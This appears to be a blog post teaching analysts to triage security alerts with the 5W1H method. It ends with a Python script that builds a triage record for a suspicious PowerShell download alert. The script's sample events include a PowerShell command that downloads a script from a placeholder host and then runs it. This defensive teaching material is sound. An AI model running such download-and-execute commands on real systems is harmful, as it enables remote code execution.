Standardizing Alert Resolution: Bridging the Cyber Security Skill Gap
The Cyber Security skill gap has been an issue for a while. Upon entry to the workforce, expectations are high: knowledge of investigation practices and technology is a must, and understanding the various attacks and alerts within the environment has to be second nature.
So how do you resolve an alert? Simple: get yourself 10,000 alerts and begin resolving them. Once you are done, the patterns that emerge will make true positives stand out. Alert resolved.
This is learning through repetition, like math class: through the grind, or through courses that imitate the grind. This way of gaining experience is slow and varies from person to person, which introduces inconsistencies in how alerts are resolved.
How can we generate output with consistent and useful results? Let's try this again. What information from an event can aid us in taking appropriate action?
For repeatability, consistency is key. Coupling alert triage and alert resolution in one standardized process creates a symbiotic relationship. Focus on consistency of the information gathered rather than on a verdict of good or evil: precise questions lead to an understanding of the event, which in turn provides a more consistent output from each alert. So let us standardize the questioning process and not worry about resolution.
The Magic
The rule of standardization is repeatability and consistency. Generic and targeted questions help extract the needed information. The Five W's and How (5W1H) is a time-tested information-gathering and problem-solving method, and it can provide this solution.
Preparation - What
Any problem benefits from a good starting point. Understanding the trigger provides initial information about potential pivot points. What should be clear before starting?
- Which data does the alert use for detection? (source)
- What are the trigger conditions? (detection logic)
- What doesn't the alert detect? (blind spots)
- How should we react to the event? (response)
Let's look at an alert named Suspicious PowerShell Download - PowerShell Script: a suspicious PowerShell execution. The event is present in PowerShell and process-execution logs (source). The trigger is download activity (detection logic). The detection tracks potential staging activity, but intent requires analysis of what was downloaded. A download performed through a different class or with obfuscation techniques will produce false negatives (blind spots).
Seasoned analysts who spend years honing their craft know their environment. That knowledge is the key to a successful investigation.
Entities - The Who
Entities are the action owners: hosts, IPs, domains, users, paths and hashes. A good logging source provides the surrounding details: the actor, the time and the action. These details let us answer the important question: who triggered this alert?
Knowing everything from the hostname and the assigned IP to the username leads us to the individual involved. This is exactly what we need when asking "Who triggered this alert?"
These artifacts give us the ability to pivot, to see the event as it unravels. The classification of entities guides how and where you can pivot.
Linking network logs to a user is not possible without creating connections: going from a user to network traffic requires a relationship. Creating these links requires knowing everything about the entities involved, and it yields the ability to see the network traffic for the user involved.
Timeline - The When
Using entities to pivot to other sources gives us the timeline, the whole picture: a start, a middle and an end, and when a specific artifact was first and last seen. This paints what happened around the event. With the timeline drafted, the pattern of the attack becomes visible.
This high-level view helps us understand what happened and narrows our search to confirm our suspicions.
Referring back to the PowerShell detection: knowing the PowerShell child process can confirm whether malicious intent was present, proving the suspicious behavior.
Impact - The Where
The affected resource is a driving factor for urgency. The resource type and its importance determine our course of action. Awareness of the infrastructure hierarchy points the way to the criticality of the event.
Knowledge of other teams' activity provides internal intelligence for identifying false-positive triggers. Service upgrade windows can cause spikes in events, generating alerts that lack intent. Understanding infrastructure at this level helps determine the priority of events, allowing us to focus on what's important.
Intent - The Why
Now is the time to organize the pieces and understand the event. The gathering of information is complete and the analysis starts. Reviewing the findings is a crucial step in understanding the alert: the intent, or knowledge of why the alert triggered in the first place, is what the analysis uses to determine maliciousness. At this point, if true intent exists, the containment phase begins.
Tying off loose ends to determine the spread will assist during containment. A summary helps with personal understanding of what happened; it lets us see what transpired, the big picture.
The why step provides a stopping point, a break, to look over everything and make sense of it. It is during this step that a determination of true positive or false positive can be made. It is also the place to ask: "Is this something to worry about?"
Prevention - The How
The prevention step, the how, analyzes the information to discover the root cause, whether the event was a true positive or not. Understanding why it triggered helps us prevent it in the future. Prevention can take many forms.
Implementing new security measures hardens the security posture of the infrastructure. The discovery of blind spots provides new knowledge to be aware of in the future.
The root cause helps us understand how the event started and why it was successful. This is a huge step in understanding how to improve the security of the company. Knowing how a threat got in gives us the ability to plan ahead.
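The six steps above, automated for the PowerShell download alert used throughout the post, as an added Python example that is not part of the original post. The events, hostnames, asset inventory and 15-minute window are constructed sample data; the why and how fields are left for the analyst, as the post describes.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events for one host (sample data, not real telemetry).
EVENTS = [
    {"ts": "2024-03-01T09:58:10", "host": "ws-042", "user": "jdoe", "pid": 4100, "ppid": 800,
     "cmd": "outlook.exe"},
    {"ts": "2024-03-01T10:00:02", "host": "ws-042", "user": "jdoe", "pid": 4132, "ppid": 4100,
     "cmd": "powershell.exe -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/a.ps1','C:\\Temp\\a.ps1')"},
    {"ts": "2024-03-01T10:00:05", "host": "ws-042", "user": "jdoe", "pid": 4150, "ppid": 4132,
     "cmd": "powershell.exe -File C:\\Temp\\a.ps1"},
    {"ts": "2024-03-01T11:30:00", "host": "ws-042", "user": "jdoe", "pid": 4200, "ppid": 800,
     "cmd": "notepad.exe"},
]
# Constructed asset inventory: the 'where' step reads criticality from it.
ASSETS = {"ws-042": "workstation", "db-01": "crown-jewel"}

def gather_who(alert):
    """Who: the entities to pivot on (host, user, process id, URLs in the command line)."""
    urls = re.findall(r"https?://[^\s'\"]+", alert["cmd"])
    return {"host": alert["host"], "user": alert["user"], "pid": alert["pid"], "urls": urls}

def gather_when(alert, events, window=timedelta(minutes=15)):
    """When: parent process, child processes, and first/last activity within the window."""
    t0 = datetime.fromisoformat(alert["ts"])
    same_host = [e for e in events if e["host"] == alert["host"]]
    parent = next((e for e in same_host if e["pid"] == alert["ppid"]), None)
    children = [e["cmd"] for e in same_host if e["ppid"] == alert["pid"]]
    nearby = [alert] + [e for e in same_host if abs(datetime.fromisoformat(e["ts"]) - t0) <= window]
    return {"parent": parent["cmd"] if parent else None, "children": children,
            "first_seen": min(e["ts"] for e in nearby), "last_seen": max(e["ts"] for e in nearby)}

def gather_where(alert, assets):
    """Where: asset criticality drives urgency; a host missing from inventory is reported as unknown."""
    return assets.get(alert["host"], "unknown")

def triage(alert, events=EVENTS, assets=ASSETS):
    """Assemble the 5W1H record. 'why' (intent) and 'how' (root cause) stay with the analyst."""
    return {"what": "Suspicious PowerShell Download - PowerShell Script",
            "who": gather_who(alert), "when": gather_when(alert, events),
            "where": gather_where(alert, assets), "why": None, "how": None}
```

Calling triage(EVENTS[1]) on the PowerShell event yields its parent (outlook.exe), the script it spawned, and the activity window, which is the child-process evidence the When step says confirms intent.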
Conclusion
Alert resolution can be a tricky endeavor that takes repetition to learn. By structuring a series of questions that help us understand an event, and by standardizing them, better understanding and resolution are possible.
Standardizing the extracted information gives us the ability to replicate the steps. Once replication is possible, automation soon follows.
In automation, breaking up the problem is key. By automating the gathering of the pieces, alert resolution time quickens, which in turn provides more time for analysis.